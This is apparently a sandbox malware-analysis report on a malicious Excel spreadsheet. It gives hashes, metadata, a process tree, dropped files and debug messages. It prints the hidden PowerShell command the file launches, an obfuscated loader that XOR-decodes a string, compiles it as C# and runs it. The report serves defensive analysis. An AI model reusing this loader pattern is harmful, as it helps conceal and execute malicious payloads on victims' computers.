File name: | 1.xls |
Full analysis: | https://app.any.run/tasks/de392e34-1494-4369-984e-834765b14311 |
Verdict: | Malicious activity |
Analysis date: | May 24, 2019, 14:06:45 |
OS: | Windows 7 Professional Service Pack 1 (build: 7601, 32 bit) |
Tags: | |
Indicators: | |
MIME: | application/vnd.ms-excel |
File info: | Composite Document File V2 Document, Little Endian, Os: Windows, Version 6.3, Code page: 1252, Last Saved By: Administrator, Name of Creating Application: Microsoft Excel, Create Time/Date: Fri May 24 07:54:11 2019, Last Saved Time/Date: Fri May 24 07:54:11 2019, Security: 0 |
MD5: | 197211E2C79201E8253C04DF609E1193 |
SHA1: | 2DA809D0D63F23438CF9C6BD2BDA1B06540CA289 |
SHA256: | B0801AC513D88A8EC0FBB4249BECD859C0B2DDB86272749C9E5D978A45DE8E11 |
SSDEEP: | 1536:xfk3hOdsylKlgryzc4bNhZFGzE+cL2knAwjBKKLDs3EC5e:1k3hOdsylKlgryzc4bNhZFGzE+cL2knP |
.xls | | | Microsoft Excel sheet (48) |
---|---|---|
.xls | | | Microsoft Excel sheet (alternate) (39.2) |
Title: | - |
---|---|
Subject: | - |
Author: | - |
Keywords: | - |
Comments: | - |
LastModifiedBy: | Administrator |
Software: | Microsoft Excel |
CreateDate: | 2019:05:24 06:54:11 |
ModifyDate: | 2019:05:24 06:54:11 |
Security: | None |
CodePage: | Windows Latin 1 (Western European) |
Company: | - |
AppVersion: | 16 |
ScaleCrop: | No |
LinksUpToDate: | No |
SharedDoc: | No |
HyperlinksChanged: | No |
TitleOfParts: |
|
HeadingPairs: |
|
CompObjUserTypeLen: | 31 |
CompObjUserType: | Microsoft Excel 2003 Worksheet |
PID | CMD | Path | Indicators | Parent process |
---|---|---|---|---|
2688 | "C:\Program Files\Microsoft Office\Office14\EXCEL.EXE" /dde | C:\Program Files\Microsoft Office\Office14\EXCEL.EXE | — | explorer.exe |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Microsoft Excel Version: 14.0.6024.1000 | ||||
3256 | powershell -WindowStyle Hidden function x481bf9 { param($l65a9e) $l41cff1 = 'teb148d'; $mb3cb79 = ''; for ($i = 0; $i -lt $l65a9e.length; $i+=2) { $xaf3e2 = [convert]::ToByte($l65a9e.Substring($i, 2), 16); $mb3cb79 += [char]($xaf3e2 -bxor $l41cff1[($i / 2) % $l41cff1.length]); } return $mb3cb79; } $f19a8f6 = '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'; $f19a8f62 = x481bf9($f19a8f6); Add-Type -TypeDefinition $f19a8f62; [l39dad9]::w6d3356(); | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | — | wmiprvse.exe |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows PowerShell Exit code: 0 Version: 6.1.7600.16385 (win7_rtm.090713-1255) | ||||
3436 | "C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe" /noconfig /fullpaths @"C:\Users\admin\AppData\Local\Temp\vhxon4gr.cmdline" | C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe | — | powershell.exe |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Visual C# Command Line Compiler Exit code: 0 Version: 8.0.50727.4927 (NetFXspW7.050727-4900) | ||||
3608 | C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\admin\AppData\Local\Temp\RES8486.tmp" "c:\Users\admin\AppData\Local\Temp\CSC8485.tmp" | C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe | — | csc.exe |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Microsoft® Resource File To COFF Object Conversion Utility Exit code: 0 Version: 8.00.50727.4940 (Win7SP1.050727-5400) | ||||
PID | Process | Filename | Type | |
---|---|---|---|---|
2688 | EXCEL.EXE | C:\Users\admin\AppData\Local\Temp\CVR3F5E.tmp.cvr | — | |
MD5:— | SHA256:— | |||
3256 | powershell.exe | C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\KSHSM9Y8F7C4WI8YEYTI.temp | — | |
MD5:— | SHA256:— | |||
3436 | csc.exe | C:\Users\admin\AppData\Local\Temp\CSC8485.tmp | — | |
MD5:— | SHA256:— | |||
3436 | csc.exe | C:\Users\admin\AppData\Local\Temp\vhxon4gr.pdb | — | |
MD5:— | SHA256:— | |||
3608 | cvtres.exe | C:\Users\admin\AppData\Local\Temp\RES8486.tmp | — | |
MD5:— | SHA256:— | |||
3436 | csc.exe | C:\Users\admin\AppData\Local\Temp\vhxon4gr.dll | — | |
MD5:— | SHA256:— | |||
3436 | csc.exe | C:\Users\admin\AppData\Local\Temp\vhxon4gr.out | — | |
MD5:— | SHA256:— | |||
3256 | powershell.exe | C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms~RF138168.TMP | binary | |
MD5:33B4C42BAF9E3CA295E3BDCD51C02EAF | SHA256:B4273C31A01B0B90869574075D54D52E8098519587F61AE756B69729D0AF86A5 | |||
3256 | powershell.exe | C:\Users\admin\AppData\Local\Temp\vhxon4gr.0.cs | text | |
MD5:24E5755C647358AEDA109972224650C1 | SHA256:6022BD9DF031B27BBA1537A55AFDBD2D543B5A44680CEECF5C03BE514ABDC0EA | |||
3256 | powershell.exe | C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms | binary | |
MD5:33B4C42BAF9E3CA295E3BDCD51C02EAF | SHA256:B4273C31A01B0B90869574075D54D52E8098519587F61AE756B69729D0AF86A5 | |||
Process | Message |
---|---|
csc.exe |
*** HR originated: -2147024774
*** Source File: d:\iso_whid\x86fre\base\isolation\com\copyout.cpp, line 1302
|
csc.exe |
*** HR propagated: -2147024774
*** Source File: d:\iso_whid\x86fre\base\isolation\com\enumidentityattribute.cpp, line 144
|
csc.exe |
*** HR originated: -2147024774
*** Source File: d:\iso_whid\x86fre\base\isolation\com\copyout.cpp, line 1302
|
csc.exe |
*** HR propagated: -2147024774
*** Source File: d:\iso_whid\x86fre\base\isolation\com\enumidentityattribute.cpp, line 144
|
csc.exe |
*** HR originated: -2147024774
*** Source File: d:\iso_whid\x86fre\base\isolation\com\copyout.cpp, line 1302
|
csc.exe |
*** HR propagated: -2147024774
*** Source File: d:\iso_whid\x86fre\base\isolation\com\enumidentityattribute.cpp, line 144
|
csc.exe |
*** HR originated: -2147024774
*** Source File: d:\iso_whid\x86fre\base\isolation\com\copyout.cpp, line 1302
|
csc.exe |
*** HR propagated: -2147024774
*** Source File: d:\iso_whid\x86fre\base\isolation\com\enumidentityattribute.cpp, line 144
|
csc.exe |
*** HR originated: -2147024774
*** Source File: d:\iso_whid\x86fre\base\isolation\com\copyout.cpp, line 1302
|
csc.exe |
*** HR propagated: -2147024774
*** Source File: d:\iso_whid\x86fre\base\isolation\com\enumidentityattribute.cpp, line 144
|